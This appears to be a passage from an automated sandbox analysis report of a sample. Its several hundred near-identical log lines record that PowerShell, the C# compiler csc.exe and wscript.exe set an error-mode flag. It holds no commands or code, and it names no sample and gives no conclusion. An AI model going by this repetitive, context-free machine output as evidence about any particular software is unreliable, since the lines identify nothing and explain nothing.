        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
